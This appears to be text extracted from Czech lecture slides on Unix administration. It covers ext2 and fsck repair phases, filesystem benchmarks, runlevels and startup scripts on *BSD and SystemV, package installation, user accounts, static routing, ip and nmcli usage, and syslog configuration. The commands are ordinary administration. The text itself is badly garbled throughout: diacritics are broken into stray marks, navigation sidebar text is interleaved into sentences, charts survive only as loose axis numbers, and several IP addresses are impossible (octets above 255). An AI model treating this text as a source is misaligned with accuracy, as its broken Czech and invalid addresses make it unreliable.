Nebezpeˇcí pˇretížení jednoho z disku˚ v RAID!

Cviˇcení

Bloky v ext2


Velký blok Zrychluje I/O (je zapotˇrebí méneˇ I/O žádostí), ale ˇ jen 1/2 naplnení ˇ ⇒ poslední blok souboru má v prum ˚ eru ˇ plýtvání kapacitou pˇri velkém poˇctu malých souboru˚ vetší (news/mail servery).

Po instalaci



Malý blok ˇ Pomalejší I/O (závisí od cache), i když nekteré problémy ˇreší prealokace kdy ext2 standardneˇ prealokuje 8 bloku. ˚ Nevýhodné pˇri obrovských souborech (obrazy CD/DVD).



Specifika ext2


V super-bloku kernel zapisuje stavy svazku “not clean” pˇri R/W pˇripojení svazku “clean” pˇri pˇrepojení na R/O nebo odpojení ˇ porušení konzistence “erroneous” pˇri zjištení



poˇcet R/W pˇripojení, cˇ as posledního fsck využívá se pˇri startu pro kontroly svazku

Benchmark Linuxu


Cíl symlinku kratší jak 60 znaku˚ je v inodeˇ


Instalace software

tune2fs(8) je schopen pˇri nastavení “erroneous” spustit nic, pˇrepojit na R/O, kernel panic s rebootem na checker


Administrace UNIXu

Ext ˇrada Linuxových FS

Leo Galamboš Instalace Pˇred instalací

FS Ext2 Ext3 Ext4

Rok 1993 2001 2008

Svazek 32TB 32TB 1024PB

Soubor 2TB 2TB 16TB

Žurnál ne ano/ne? ano/ne




Kompatibilita


ext2-ext3: tune2fs -j /dev/sda3 ext3-ext4: tune2fs -O extents,uninit_bg,dir_index /dev/sda3 fsck.ext4 -yfD /dev/sda3

Nová vlna


Nová generace


Rodina Ext (+XFS) tradiˇcní design 90. let


nepodporuje snapshoty LVM, RAID je až další vrstva


ZFS (ˇcásteˇcneˇ i BTRFS) koncepˇcneˇ jiný pˇrístup: velká data, výpadky disku˚



zaintegrovaní LVM-RAID-like podpory

Start OS

R/W cache via SSD, komprese, deduplikace

*BSD

Vypnutí OS

OpenBSD SystemV

výkon horší jak u ext4 (DB nasazení) - muže ˚ se ˇ zmenit? Distribuované pro clustery BigData nasazení mnoho klientu, ˚ velké bloky a proudy dat

Nová vlna


Administrace UNIXu

Opravy s fsck(8)


ˇ automatické spouštení: pˇri každém N-tém pˇripojení svazku; každých N dní

Po instalaci


po havárii: pˇrerušené el. napájení, systém zpanikaˇril, zniˇcené kritické struktury disku ˇ v 5-7 fázích, které na sobeˇ závisí typicky beží



kontrola názvu˚ souboru˚

Vypnutí OS *BSD

Super block/FS je nakonec oznaˇcen jako “ˇcistý” fsck(8) standardneˇ pˇreskakuje

“ˇcisté”29

FS



29

ˇ buffer-cache a Každý zápis zneˇcistí FS, pˇri vyprázdnení ˇ cˇ istým. provedení všech zápisu˚ se stává opet

Opravy s fsck(8)


Super block modifikován po každém zápisu do FS, periodicky sync-ován pˇri poškození je nutné použít záložní30 Kontrola inodu˚ volné bloky nepoužívá žádná inoda



korektní obsah: velikost souboru, ˚ poˇcet vazeb. . .

Nová vlna


30

fsck -b ..., viz napˇríklad mke2fs -n ...

Fáze 0 – inicializace fsck(8)


Problém Pokud jsou chyby ješteˇ pˇred fází 1, pak je typicky poškozen super block.


ˇ Rešení Nezbývá než použít záložní super block, jehož pozici (pokud ji nevíme) lze zjistit z formátovacího dry-run nad konkrétním diskovým oddílem se stejnými parametry jako v dobeˇ instalace.



Fáze 1: Kontrola bloku˚ a velikostí


UNKNOWN FILE TYPE I=XXXX (CLEAR) ˇ Mužete Chybný záznam typu souboru v inode. ˚ ponechat nebo vyˇcistit.


Souborové systémy

PARTIALLY TRUNCATED INODE I=XXXX (SALVAGE) Inoda ukazuje na méneˇ datových bloku˚ než soubor. To ˇ není zásadní problém, nekonzistence vznikla behem zkracování souboru.



block BAD I=XXXX Inoda obsahuje cˇ íslo bloku, které je mimo povolené meze.

Nová vlna


block DUP I=XXXX ˇ ˇ Inoda sdílí nekterý z datových bloku˚ s jinou. Je spuštena pomocná rutina, která vypíše cˇ ísla kolizních inodu. ˚

Cviˇcení

Fáze 2: Kontrola adresáˇru˚


ˇ Odstranuje adresáˇrové záznamy z vadných inodu˚ detektovaných v pˇredchozím kroku, kontroluje adresáˇre na validní inodové ukazatele.

Po instalaci



ROOT INODE NOT DIRECTORY (FIX?) Inoda 2 (koˇrenový adresáˇr) není adresáˇr, je možné ji ˇ transformovat, ale vetšinou s fatálním dopadem na obsah svazku.



Fáze 2: Kontrola adresáˇru˚


OUT OF RANGE I=XXXX NAME=YYYY (REMOVE?)

Instalace

Nesprávné cˇ íslo inody. Chybu lze ponechat anebo soubor kompletneˇ zrušit.

Souborové systémy



UNALLOCATED I=XXXX OWNER=. MODE=. SIZE=. MTIME=. TYPE=. (REMOVE?)



Adresáˇr používá nealokovanou inodu. Chybu lze ponechat anebo soubor kompletneˇ zrušit.


BAD/DUP I=XXXX OWNER=. MODE=. SIZE=. MTIME=. TYPE=. (REMOVE?)


Inoda odkazovala vadný nebo duplicitní blok. Chybu lze ponechat anebo soubor kompletneˇ zrušit.

Cviˇcení

Fáze 3: Kontrola dosažitelnosti adresáˇru˚



Vytváˇrí lost+found adresáˇr, kam jsou umíst’ovány všechny nedosažitelné adresáˇrové objekty. V tomto kroku (zatím) pouze adresáˇre.




Fáze 4: Kontrola poˇctu odkazu˚ a vazeb


UNREF FILE I=XXXX OWNER=. MODE=. SIZE=. MTIME=. TYPE=. (RECONNECT?)


Soubor není odkazován, muže ˚ být smazán anebo ˇ do lost+found. Prázdné, neodkazované umísten soubory jsou automaticky smazány.

Po instalaci


LINK COUNT DIR/FILE I=XXXX OWNER=. MODE=. SIZE=. MTIME=. COUNT=. (ADJUST?) Poˇcet odkazu˚ na objekt nesouhlasí s poˇctem ˇ Korekce je vítána. . . zaznamenaným v inode.

BAD/DUP FILE I=XXXX OWNER=. MODE=. SIZE=. MTIME=. (CLEAR?) Adresáˇr nebo soubor používá vadný nebo duplicitní blok. Chybu lze ponechat anebo soubor kompletneˇ zrušit.

Benchmark Linuxu



Fáze 5: Kontrola Cylinder Groups


Souborové systémy Minix Filesystem ext2 Další vývoj

Zkontroluje mapy inodu˚ a datových bloku. ˚ Pˇríslušneˇ opraví i jejich seznamy “volných”.




Po kontrole souborového systému


pˇri velkém poˇctu defektu˚ spust’te opakovaneˇ zkontrolujte obsah lost+found, zvlášteˇ hledejte speciální soubory (zaˇrízení) ˇ r okamžiteˇ pojmenované roury i sockety lze témeˇ smazat ˇ originální umístení ˇ zbývajících souboru˚ a zjistete pˇrípadneˇ je obnovte ze záloh




Administrace UNIXu

Postmark: rychlost FS na Linuxu

Leo Galamboš

Postmark test s náhodným create, delete, read, append na souborech do 10kB pro 50000 transakcí. Souborový systém ext2 ext3 jfs xfs ext2 ext3 jfs xfs ˇ ext2 Vítez:

Souboru˚ 1000 1000 1000 1000 20000 20000 20000 20000

ˇ Cas 89 187 546 274 781 868 891 1182





Administrace UNIXu

Benchmark Linuxu


Time to open a file depending on number of subdirectories in the path

Pˇred instalací

45us

Instalace

Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2

40us 35us

Po instalaci


30us


25us Time


20us

Vypnutí OS *BSD OpenBSD

15us

SystemV Nová vlna

10us


5us

Dodatky 0s 0

20

40

60

80 100 120 Number of subdirectories

140

160

180

200

Cviˇcení

Administrace UNIXu

Benchmark Linuxu


Time to read a file from cache depending on file size

Pˇred instalací

100ms

Instalace


10ms

Po instalaci


1ms

fsck

Time

Benchmark Linuxu

ˇ Behové úrovneˇ OS 100us

Start OS Vypnutí OS *BSD OpenBSD

10us

SystemV Nová vlna

Instalace software 1us

Správa uživatelu˚ Dodatky 100ns 1B

10 B

100 B

1kB

10kB 100kB Number of bytes

1MB

10MB

100MB

Cviˇcení

Administrace UNIXu

Benchmark Linuxu


Time to write a file to cache depending on file size

Pˇred instalací

100ms

Instalace


10ms

Po instalaci


1ms

Benchmark Linuxu

Time


100us


Instalace software

10us

Správa uživatelu˚ Dodatky 1us 1B

10 B

100 B

1kB

10kB 100kB Number of bytes

1MB

10MB

100MB

Cviˇcení

Administrace UNIXu

Benchmark Linuxu


Time to create specified number of files in a directory (their total size is 1GB)

Pˇred instalací

1000s

Instalace


800s

Po instalaci


600s

Benchmark Linuxu

Time


400s


Instalace software

200s

Správa uživatelu˚ Dodatky 0s 10

100

1000 10000 Number of files

100000

1e+06

Cviˇcení

Administrace UNIXu

Benchmark Linuxu


CPU consumption when creating specified number of files in a directory

Pˇred instalací

500s

Instalace


400s

Po instalaci


CPU time consumed

Další vývoj fsck

300s

Benchmark Linuxu


200s


Instalace software

100s


100


100000

1e+06

Cviˇcení

Administrace UNIXu

Benchmark Linuxu


Time to delete specified number of files in a directory

Pˇred instalací

400s

Instalace


350s

300s

Po instalaci


Time

250s

Benchmark Linuxu

ˇ Behové úrovneˇ OS 200s


150s


100s


50s

Dodatky 0s 10

100


100000

1e+06

Cviˇcení

Administrace UNIXu

Benchmark Linuxu


CPU consumption when deleting specified number of files in a directory

Pˇred instalací

100s

Instalace


80s

Po instalaci


CPU time consumed

Další vývoj fsck

60s

Benchmark Linuxu


40s


Instalace software

20s


100


100000

1e+06

Cviˇcení

Administrace UNIXu

Benchmark Linuxu


Time to read specified number of files in a directory (their total size is 1GB)

Pˇred instalací

250s

Instalace


200s

Po instalaci


150s

Benchmark Linuxu

Time


100s


Instalace software

50s


100


100000

1e+06

Cviˇcení

Administrace UNIXu

Benchmark Linuxu


CPU consumption when reading specified number of files in a directory

Pˇred instalací

100s

Instalace


80s

Po instalaci


CPU time consumed

Další vývoj fsck

60s

Benchmark Linuxu


40s


Instalace software

20s


100


100000

1e+06

Cviˇcení

Administrace UNIXu

Benchmark Linuxu


RAW I/O throughput of filesystems

Pˇred instalací

45MB/s Write Rewrite Read

40MB/s


Souborové systémy

35MB/s


30MB/s

fsck

Throughput

Benchmark Linuxu

25MB/s


20MB/s


15MB/s

Nová vlna

Instalace software

10MB/s

Správa uživatelu˚ 5MB/s

Dodatky Cviˇcení

0 B/s Lin/Ext2

Lin/Ext3

Lin/Reiser

Lin/XFS

Lin/JFS

Lin/Spad Spad/Spad Spad/Ext2

Administrace UNIXu

Benchmark Linuxu

Leo Galamboš

CPU consumption of filesystems when creating/rewriting/reading 8GiB file

Instalace Pˇred instalací

Write Rewrite Read


Souborové systémy

20s

Minix Filesystem

CPU consumption (seconds)

ext2 Další vývoj fsck

15s

Benchmark Linuxu


10s


Instalace software

5s


0s Lin/Ext2

Lin/Ext3

Lin/Reiser

Lin/XFS

Lin/JFS

Lin/Spad

Spad/Spad Spad/Ext2

Administrace UNIXu

Benchmark Linuxu

Leo Galamboš

Time to do operatins with directory tree Light color bar represents the time needed to flush cache


Extract with tar Copy directory tree Read directory tree Delete directory tree

200s

Po instalaci


150s

Benchmark Linuxu

Time


100s


Instalace software

50s


0s Lin/Ext2

Lin/Ext3

Lin/Reiser

Lin/XFS

Lin/JFS

Lin/Spad

Spad/Spad Spad/Ext2

ˇ Behová úrovenˇ



urˇcuje v jakém režimu UNIX pracuje ˇ je možné pˇrepínání mezi úrovnemi ˇ behová úrovenˇ muže ˚ sloužit (kupodivu) i pro vypnutí




Administrace UNIXu

Start OS


ˇ cu˚ Start zavadeˇ


Souborové systémy

Nahrání kernelu

Minix Filesystem ext2 Další vývoj fsck

ˇ kernelu Spuštení detekce HW

Benchmark Linuxu


ˇ init(8) Spuštení

OpenBSD SystemV

BSD single-user

Nová vlna

Instalace software

Start-up skripty

Správa uživatelu˚ Dodatky

ˇ Bežící systém

Cviˇcení

Prostˇredky na vypnutí OS


halt(8), reboot(8), poweroff(8) — zastaví a pak cˇ eká, pˇrípadneˇ restartuje nebo vypne stroj shutdown(8) — korektní vypnutí systému s prodlevou a doprovodným hlášením. Oznámení je ukládáno do /etc/nologin ⇒ brání logování dalších uživatelu. ˚



init(8) — pˇrepnutí na úrovenˇ rezervovanou pro vypínání systému (SysV)

SystemV Nová vlna


ˇ Behové úrovneˇ *BSD



Single-user pro opravy kritických stavu˚ ˇ Multi-user bežný režim




Start single-user





Multi-user → single-user: kill -s TERM 1





Single-user → multi-user: exit





Start-up skripty OpenBSD


1

nastartování kernelu

2

ˇ /etc/rc spuštení

3

naˇctení /etc/rc.conf (defaultní nastavení)

4

naˇctení /etc/rc.conf.local (lokální nastavení)

5

mount filesystému˚

6

promazání /tmp

7

inicializace síteˇ /etc/netstart




8

start démonu˚


Instalace software

9

dodateˇcné kontroly: savecore, kvóty disku. . .


10

start lokálních démonu˚ /etc/rc.local

Dodatky Cviˇcení

Vypnutí OpenBSD



1

ˇ /etc/rc.shutdown spuštení

2

inicializace zastavení




ˇ Behové úrovneˇ SystemV


0 halt


1 single-user31 2 no network32


3 multi-user 4 ??? 5 poweroff33 / xdm34 6 reboot



7-9 nepoužívá se

Nová vlna

Instalace software Správa uživatelu˚ Dodatky 31

Single-user spouští /sbin/sulogin na /dev/console 32 IRIX: multi-user 33 Solaris 34 Linux world

Cviˇcení

Start-up skripty SystemV


1

nastartování kernelu

2

start init(8)

3

naˇctení /etc/inittab inicializace dle inittab(5)

4

1 2 3 5

ˇ initdefault: poˇcáteˇcní behová úrovenˇ sysinit: mount filesystému; ˚ boot(wait) start35 start N-úrovneˇ

ˇ skripty K* potom S* “inicializace” úrovne: /etc/rcN.d /etc/rc.d/rcN.d /etc/runlevels





35

clock, consolefont, hostname, checkfs

/etc/inittab


id:3:initdefault: # System initialization, mount local filesystems, etc. si::sysinit:/sbin/rc sysinit # Further system initialization, brings up the boot runlevel. rc::bootwait:/sbin/rc boot l0:0:wait:/sbin/rc shutdown l1:S1:wait:/sbin/rc single l2:2:wait:/sbin/rc nonetwork l3:3:wait:/sbin/rc default l4:4:wait:/sbin/rc default l5:5:wait:/sbin/rc default l6:6:wait:/sbin/rc reboot




# TERMINALS c1:12345:respawn:/sbin/agetty 38400 tty1 linux c2:2345:respawn:/sbin/agetty 38400 tty2 linux c3:2345:respawn:/sbin/agetty 38400 tty3 linux c4:2345:respawn:/sbin/agetty 38400 tty4 linux c5:2345:respawn:/sbin/agetty 38400 tty5 linux c6:2345:respawn:/sbin/agetty 38400 tty6 linux # What to do at the "Three Finger Salute". ca:12345:ctrlaltdel:/sbin/shutdown -r now



x:a:once:/etc/X11/startDM.sh

Vypnutí SystemV


1

pˇrepnutí do požadované úrovneˇ


0 = halt 6 = reboot 5 = poweroff (Solaris) 2

ˇ skripty K* potom S* “inicializace” úrovne:



/etc/rcN.d /etc/rc.d/rcN.d /etc/runlevels



systemd, launchd, upstart – hype?


Situace Servery: tvrdý stˇret puvodní ˚ a „moderní“ koncepce Klienti: zrychlení startu, ˇrešení komplexních závislostí




Silná kritika zavádí uniformitu do celého ekosystému


vnucuje mainstream a centralizaci

Instalace software

eliminuje alternativy


. . . vede do pekla?

Dodatky Cviˇcení

Instalace



ze zdrojových kódu˚ autora balíˇcek od 3. výrobce balíˇckovací modul OS modul OS pro instalace (ports, portage)




Ze zdrojových kódu˚


Metoda configure && make && make install

Klady ˇ verze okamžitá instalace nejnovejší



možnost libovolné konfigurace



Zápory


ˇ eˇ režie na správu s poˇctem balíˇcku˚ roste neúmern


obtížná orientace v parametrech (systémových ˇ promenných) pro správný build

Instalace software

možná kolize s balíˇckovacím modulem OS

Dodatky


Cviˇcení

Speciální balíˇcek od výrobce


Klady pohodlné (pokud máme balíˇcek pro naši distribuci)



možnost oficiální “reklamace” typicky už je prebuildován



Zápory


nepohodlné (pokud nemáme balíˇcek pro naši distribuci) ˇ v pˇrípadeˇ problému˚ se težko zjišt’uje duvod ˚ kolize nelze snadno rebuildovat na konkrétní CPU



Balíˇckovací modul OS


Klady ˇ vetšinou prebuild registrace do centrální báze instalovaného software — snadný mngm doinstaluje potˇrebné balíˇcky, ohlídá kolize




Zápory

Vypnutí OS *BSD OpenBSD

nelze snadno rebuildovat na konkrétní CPU

SystemV Nová vlna

kolize potˇrebných balíˇcku˚ zablokují instalaci

Instalace software

info o konfiguracích potˇrebných balíˇcku˚ snadno “uplavou”


Balíˇckovací systém v *BSD


pkg_info seznam všech nainstalovaných balíˇcku˚ pkg_add instalace balíˇcku pkg_delete odinstalování balíˇcku

Po instalaci


Balíˇckem je typicky .tgz nebo .tbz archív, který byl vyroben v rámci stavby software z portu˚ /usr/ports/packages.

Benchmark Linuxu


Podpora pro HTTP/FTP pkg_add ftp://ftp.openbsd.cz/pub/OpenBSD/ 3.7/packages/i386/mc-4.6.1pre1p0.tgz

SystemV Nová vlna


Ports, portage


Klady build ze zdrojových kódu˚ autora



vyrobí se “balíˇcek” pro balíˇckovaˇc OS ⇒ standardní cesta instalace snadný update



rychlé

Vypnutí OS *BSD OpenBSD SystemV

Zápory bez znalosti konkrétní implementace ports se obtížneˇ tvoˇrí vlastní port

Nová vlna


Ports v OpenBSD


Metoda cd /usr/ports/shells/bash && make XXXX fetch stáhne zdrojové soubory a patch-e checksum zkontroluje checksum36 depends instalace závislostí37



extract rozbalí zdrojové soubory patch na-patch-uje

Benchmark Linuxu


configure spustí konfiguraci build postaví software fake instalace do fiktivního adresáˇre package tvorba balíˇcku nad fiktivní instalací install instalace balíˇcku 36 37

NO_CHECKSUM=Yes NO_DEPENDS=Yes



Vyhledávání v portech





Báze /etc/passwd


Souborové systémy

pˇred v7 jediná centrální báze i s hash hesel po v7 obsahuje jen public položky, ostatní položky v shadow38 bázi login jméno domovský adresáˇr jméno uživatele. . .




38

/etc/shadow, /etc/master.passwd. . .

Správa báze uživatelu˚


useradd(8) založí úˇcet uživatele -m -k dir inicializace skeleton-em OpenBSD /etc/usermgmt.conf FreeBSD /etc/adduser.conf Linux /etc/default/useradd ˇ úˇctu uživatele na *BSD userdel(8) odstranení rmuser(8) ˇ položek úˇctu uživatele usermod(8) zmeny chpass(1) modifikace položek (shell, . . . ) gpasswd(1) modifikace skupin (pˇriˇrazení uživatelu, ˚ ...)

Po instalaci




Korektní administrace


Souborové systémy 1 2

3

na root-a se neloguje

Minix Filesystem

ˇ ˇ se na root-a je lepší mít bežného uživatele a z nej pˇrehazovat pˇres su(8) nebo sudo(8)

Další vývoj

ˇ nekteré operaˇcní systémy39 dovolují su(8) jen uživatelum ˚ ve skupineˇ wheel

ext2




39

OpenBSD

Uzpusobení ˚ logování


/etc/issue Linux: text vypsaný pˇred výzvou k zadání pˇrihlašovacích údaju˚ muže ˚ obsahovat speciální sekvence rozpoznatelné getty(1) ˇ /etc/gettytab OpenBSD: definice terminálu umožnuje nastavovat i “initial message” a “login message” /etc/motd “Message Of The Day” vypíše login(1) po ˇ úspešném pˇrihlášení




Dodatky


Solaris – halt, reboot, poweroff Nevypínají se démoni pˇres K* skripty, protože se v tomto konkrétním pˇrípadeˇ neˇcte /etc/rc.N.



*BSD – kontrola souborových systému˚ Kontrola je aktivní, pokud neexistuje soubor /fastboot.



*BSD – bezpeˇcnost single-user


Terminál definovaný jako “ttyC0 . . . vt220 on secure” v /etc/ttys:

Nová vlna


single-user nepožaduje heslo root-a multi-user muže ˚ se logovat root (pˇrímo)

Dodatky Cviˇcení

init.d implementace


f o r i i n / e t c / rcN . d / K∗ do $ i stop done



f o r i i n / e t c / rcN . d / S∗ do $i start done

Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna


Vyzkoušejte si RCS cd / e t c mkdir RCS c i −u soubor . c o n f co − l soubor . c o n f



Ports


cd / u s r t a r z x f p o r t s . t a r . gz cd p o r t s / misc / mc make i n s t a l l


Instalace software 1

2

Vytvoˇrte dva stroje v ruzných ˚ HUBech a jeden zapojený do obou HUBu. ˚ Použijte alesponˇ dva operaˇcní systémy. Napište skripty pro rychlou správu konfigurací pod RCS.


Vyzkoušejte si


Souborové systémy 1

Napište skripty pro rc.d v OpenBSD. Jejich úložišteˇ ˇ být v /usr/local/etc/rcN.d. by melo


2

3

Použijte je napˇríklad pro start a shození sshd a dalších démonu˚ nyní startovaných v /etc/rc. Jaké mají nové skripty (ne)výhody oproti puvodním? ˚



Vyzkoušejte si



1

2 3

smažte obrazovku pˇred každou výzvou k pˇrihlášení, ˇ nápoveda: cl = \E[H\E[2J a gettytab ˇ úvodní i pˇrihlašovací zprávu zmeˇ nte upravte motd(5) tak, aby neobsahoval dlouhý text




Vyzkoušejte si


1

v /etc/sysctl.conf povolte Ctrl-Alt-Del pro halt

2

restartujte VPC

3

4

ˇ rte provedení zmeny ˇ sysctl oveˇ machdep.kbdreset (=1) ˇ v /etc/ttys všechny “secure” terminály na zmeˇ nte ne-“secure”

5

ˇ vytvoˇrte si bežného uživatele useradd -m yahoo

6

nastavte mu heslo passwd yahoo

7

odlogujte se ze všech terminálu˚ VPC





Úkol

Dodatky

Pˇridejte uživatele yahoo do skupiny wheel.

Cviˇcení

Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny

ˇ Cást III

Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu

ˇ Smerování, DNS

Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

Cviˇcení

Obsah

Administrace UNIXu

ˇ Smerování ˇ Statické smerování Linuxoviny

ˇ Smerování

19

Zpracování zpráv systému


20

Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

18

21

Cviˇcení

Leo Galamboš

ˇ Statické smerování Linuxoviny


Cviˇcení

Administrace UNIXu

Pˇríklad

Leo Galamboš

B

F

10.10.20.0/24

10.10.60.0/24


Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS

C

D

E

10.10.30.0/24

10.10.40.0/24

10.10.50.0/24

Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

Cviˇcení

A

G

10.10.10.0/24

10.10.70.0/24

ˇ Smerování


Zpracování zpráv systému 1

dynamické ˇ (systémy) uvnitˇr anebo mezi autonomními sítemi RIPv2, IGRP, OSPF, BGP, EGP. . . zebra/quagga, gated, routed OpenBGPD, OpenOSPFD, BIRD

Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname

2

statické

Pˇríklady, speciality Typické pasti a chyby Praxe

Cviˇcení

Administrace UNIXu

ˇ Smerovací tabulky

Leo Galamboš ˇ Smerování ˇ Statické smerování

lo 127.0.0.0/8

Linuxoviny

eth0

Stanice


ostatní

Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru

Kernel IP routing table Destination Gateway 195.113.18.0 0.0.0.0 127.0.0.0 0.0.0.0 0.0.0.0 195.113.19.222

BIND implementace

Genmask 255.255.254.0 255.0.0.0 0.0.0.0

Flags U U UG

MSS 0 0 0

Window 0 0 0

irtt 0 0 0

Iface eth0 lo eth0

Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

195.113.18.0/23 pˇrímo dosažitelné na eth0 127.0.0.0/8 pˇrímo dosažitelné na lo ˇ ostatní na defaultní smerovaˇ c 195.113.19.222 za eth0

Cviˇcení

Administrace UNIXu

ˇ Smerovací tabulky aktivních spojení

Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny

$ /sbin/route -Cn Kernel IP routing cache Source Destination 74.125.87.101 172.315.48.50 172.315.48.41 172.315.48.50 172.315.48.50 172.315.48.41 127.0.0.1 127.0.0.1 172.315.48.50 172.315.48.41 172.315.48.50 74.125.13.89 172.315.48.50 172.315.48.1 172.315.48.50 172.315.48.1 172.315.48.50 74.125.13.89 74.125.13.89 172.315.48.50 172.315.48.50 74.125.87.101 127.0.0.1 127.0.0.1 172.315.48.50 74.125.87.101 172.315.48.1 172.315.48.50

Zpracování zpráv systému Gateway 172.315.48.50 172.315.48.50 172.315.48.41 127.0.0.1 172.315.48.41 172.315.48.1 172.315.48.1 172.315.48.1 172.315.48.1 172.315.48.50 172.315.48.1 127.0.0.1 172.315.48.1 172.315.48.50

Flags Metric Ref l 0 0 il 0 0 0 0 l 0 0 0 1 0 0 0 0 0 0 0 1 l 0 0 0 1 l 0 0 0 0 il 0 0

Use 2 2 0 13 1 0 6 6 1 3 1 6 0 6

Iface lo lo eth1 lo eth1 eth1 eth1 eth1 eth1 lo eth1 lo eth1 lo


Cviˇcení

ˇ Smerovací tabulky


netstat(8) ˇ -r výpis smerovacích tabulek -n bez symbolických jmen route(8) ˇ show výpis smerovacích tabulek add pˇridání nové cesty do tabulky ˇ cesty z tabulky delete odstranení


Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility

ifconfig(8) – parametry na sít’ových adaptérech

Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby

Inicializace ˇ startovací skripty. Platformoveˇ závislé, provádejí OpenBSD /etc/netstart /etc/mygate /etc/hostname.* Gentoo /etc/conf.d/net

Praxe

Cviˇcení

Detekce špatneˇ nastavených tabulek


Zpracování zpráv systému $ ping -A ns.cythres PING ns.cythres (172.****) 56(84) bytes of data. 64 bytes from ns.cythres (172.****): icmp_seq=1 ttl=255 time=0.202 ms 64 bytes from ns.cythres (172.****): icmp_seq=2 ttl=255 time=0.207 ms : :

Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility

$ ping 172.16.255.1 sendto: Network is unreachable

Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

Cviˇcení

Administrace UNIXu

Centralizovaný ip tool

Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny # ip addr show 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default Zpracování zpráv link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 systému inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever Domain Name inet6 ::1/128 scope host System valid_lft forever preferred_lft forever Zóny a domény

Co je potˇreba pro zónu

# ip addr add 192.168.300.4 dev p5p1 # ip addr del 192.168.300.4/24 dev p5p1

Módy dotazu˚ do DNS Name servery Konfigurace serveru

# ip link set p5p1 up # ip link set p5p1 down

BIND implementace Klientské utility Pˇrevod IP→hostname

# ip route show default via 192.168.300.254 dev p5p1 proto static metric 100 172.16.304.0/24 dev vmnet1 proto kernel scope link src 172.16.304.1 192.168.300.0/24 dev p5p1 proto kernel scope link src 192.168.300.252 192.168.301.0/24 dev vmnet8 proto kernel scope link src 192.168.301.1 # ip route add 172.16.300.0/24 via 192.168.300.0 dev p5p1 # ip route del 172.16.300.0/24 # ip route add default via 192.168.333.1


metric 3 Cviˇcení

Network Manager



# nmcli OBJECT CMD OBJECT g[eneral] n[etworking] r[adio] c[onnection] d[evice] a[gent]

Domain Name System NetworkManager’s general status and operations overall networking control NetworkManager radio switches NetworkManager’s connections devices managed by NetworkManager NetworkManager secret agent or polkit agent

Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility

# # # # #

nmcli nmcli nmcli nmcli nmcli

con con con con con

add type bond con-name bond0 ifname bond0 mode 802.3ad add type bond-slave ifname p4p1 master bond0 add type bond-slave ifname em1 master bond0 delete em1 delete p4p1


Cviˇcení

Administrace UNIXu

Syslog


démon starající se o nakládání s logy/zprávami zprávy jsou urˇcené zdrojem (modul systému: kernel, user prg, mail. daemon, auth. . . ) a úrovní konfigurace /etc/syslog.conf urˇcuje: komu bude zpráva doruˇcena na konzoli do jakého souboru bude zpráva pˇripsána na jaký stroj bude zpráva pˇredána

Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality

unsecure mód: syslog_flags -u (remote accept) API: openlog(3) a syslog(3) ˇ software: metalog, syslog-ng, rsyslog, . . . novejší

Typické pasti a chyby Praxe

Cviˇcení

Administrace UNIXu

Pozadí


originální syslog je de-facto standard status quo formalizován v RFC 3164 další rozvoj v rámci RFC 5424


ˇ transport zpráv (TCP/TLS RFC 5425) spolehlivejší podpora puvodního ˚ stylu s UDP (RFC 5426) formalizace kategorií zpráv (RFC 5427) autentizace puvodu, ˚ integrita, odolnost proti ˇ opakování, cˇ íslování a detekce chybejících zpráv (RFC 5484)


Cviˇcení

Administrace UNIXu

Selektory


Zdroje zpráv auth, authpriv cron daemon

Úrovneˇ zpráv emerg alert

kern

crit

lpr

err

mail mark news

notice info

user

debug

local0. . . local7

Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility

warning

syslog uucp



Cviˇcení

Administrace UNIXu

Pˇríklad


!* *.notice;auth,authpriv,cron,ftp,kern.none *.emerg kern.debug;user.info;syslog.info auth.info authpriv.debug cron.info daemon.info ftp.info lpr.debug mail.info *.notice;ftp,kern,lpr,mail,user.none !sudo *.* !!sudo

/var/log/messages * root /var/log/authlog /var/log/secure /var/cron/log /var/log/daemon /var/log/xferlog /var/log/lpd-errs /var/log/maillog @loghost:514 /var/log/sudo

Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

Cviˇcení

Administrace UNIXu

Syntax



